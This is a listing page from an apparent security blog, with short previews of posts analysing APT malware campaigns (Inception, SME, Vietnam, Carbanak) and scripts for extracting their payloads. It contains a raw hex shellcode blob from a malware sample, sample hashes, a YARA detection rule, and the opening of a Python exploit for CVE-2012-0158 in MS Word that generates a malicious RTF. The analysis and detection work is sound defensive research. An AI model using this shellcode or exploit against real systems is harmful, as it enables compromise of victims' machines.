View RSS Feed

w@rri0r@bh@y

  1. Apt inception

    Greet: "Vinnu", "nightrover","bond"

    In the month of Dec 2014 BlueCoat released report on APT campaign named ad "Inception". The spear phishing mail was sent with attachment with various names we analyzed attachment which was named as "Car for sale.doc". The Attachment was exploit (CVE-2012-0158) with embed VBS and decoy file themed an advertisement of a used car for sale that purportedly originated from Michael Hahne employee at the ...

    Updated 03-23-2015 at 05:59 PM by 41.w4r10r

    Categories
    Uncategorized
  2. Apt sme

    Greet : "Vinnu", "nightrover","bond"

    I have used name "APT SME " because payload developer have used the name for his project.I have just created automation to exctract payload file from the exploit used in APT SME.

    Sample used for creating Automation:
    Md5 - 57A8DB5A5D35464BE16518332A64A992

    Shellcode:

    Code:
    e80000000081efb178fd9401f76681e6a9008b04248d7424186681cfa81d83c40181f782e7813383c40281e7e3000000446681eeb25e83e8056689ff66c1ef7905c00000006681e7bc00bb84feffffc1e66cf7db8d7c241883e20066c1e6f880e50001f680c5378d74242080c5b46601f666478a0883e76e01fe30e96681ce483df6c101751581f782e7813380c1016681cee476eb106681f7ecf181ce63af2725fec9c1e63bc1efed880866c1e74d83c2016629f783e8ff8d7c240439da75b1db238e619bda619ce6619cf66184e261acca61dc8cd3a2f29f1861afd661beef92eb006198caeb04db23ab47eb0261f2c1b2ee6b110fca37159f05a361b0ceeb018c61e6a161b0f6eb01e9c661bfdb318c6b2115e5a980e2b961aecee2153a6f2a9f0752a5a588886335459f02459f0f6bd54d4d31319f32bcbdb963146904e2537344e8ea522f77f66b5579ebeaeb1d0dd8ecac0813b1b5b4d747f370699f5a692deeb3bddb235c38546744e8ea60fd6a10ea9ee36a2ceed2189ee8da1862fdabadd31b9f02b58c53a7b08c63e5bddb238e619bda619ce6619cf66184e26194ca61dcd2a5f29f1901a3b58207d38bf0153d821515e5ea15dece82eaeaeeea153aefeafaeaeaba159eceeedb232deaeaeaeaea692bee692aee6b13ea7ae9ea9f06b4b553cfe6eaeabc6b2c8248e8eabd194e29025815151561afd661b6ef92eb0161a1f209d8a361a9caeb0261de62eb04db2a7346eb282b20e7a2931dd1beceee9f0b61a9ceeb028c61e6a261a9f6eb0261ee62eb026313b0b4b82900
    ...

    Updated 03-20-2015 at 12:00 PM by w@rri0r@bh@y

    Categories
    Uncategorized
  3. Apt vitnam

    Greet :- "vinnu","nightrover","bond"

    I used the name "VITNAM" because the decoy file had some contents from Vietnam. Here i have automated a process through which we can extract an Executable from rtf exploit.

    Yara Rule:
    Code:
    rule APT_VITNAM {
      meta:
       author = "w@rri0r@bh@y"
      strings :
       $magic = "{\\rt"
       $v0 = "eb00eb1490905e33c980368746"
    ...

    Updated 03-20-2015 at 02:35 PM by [s]

    Categories
    Uncategorized
  4. Apt carbanak

    Greet : "Vinnu", "nightrover","bond"

    All the analysis is done by "Kaspersky" company. I have just created automation to exctract payload from the exploit used in APT CARBANAK.

    Sample used for creating Automation:
    Md5 - 8fa296efaf87ff4d9179283d42372c52, 665b6cb31d962aefa3037b5849889e06, 2c395f211db2d02cb544448729d0f081, 31e16189e9218cb131fdb13e75d0a94f, db83e301564ff613dd1ca23c30a387f0, 86e48a9be62494bffb3b8e5ecb4a0310, 6c7ac8dfd7bc5c2bb1a6d7aec488c298 ...

    Updated 03-20-2015 at 12:01 PM by w@rri0r@bh@y

    Categories
    Uncategorized
  5. Exploit for MS WORD 2010 in Windows 7 (CVE-2012-0158)

    Exploit For MS WORD 2010
    CVE-2012-0158
    ASLR BYPASS - MSCOMCTL.OCX (non-ASLR Module)
    DEP BYPASS - Complete code in code section

    Code:
    #!/usr/bin/python
    
    import struct
    import binascii
    
    header = (
    "\x7B\x5C\x72\x74\x66\x31\x0D\x0A\x7B\x5C\x66\x6F\x6E\x74\x74\x62\x6C\x7B\x5C\x66\x30\x5C"
    "\x66\x6E\x69\x6C\x5C\x66\x63\x68\x61\x72\x73\x65\x74\x30\x20\x56\x65\x72\x64\x61\x6E\x61"
    "\x3B\x7D\x7D\x0D\x0A\x5C\x76\x69\x65\x77\x6B\x69\x6E\x64\x34\x5C\x75\x63\x31\x5C\x70\x61"
    ...

    Updated 03-02-2014 at 07:55 PM by w@rri0r@bh@y

    Categories
    Uncategorized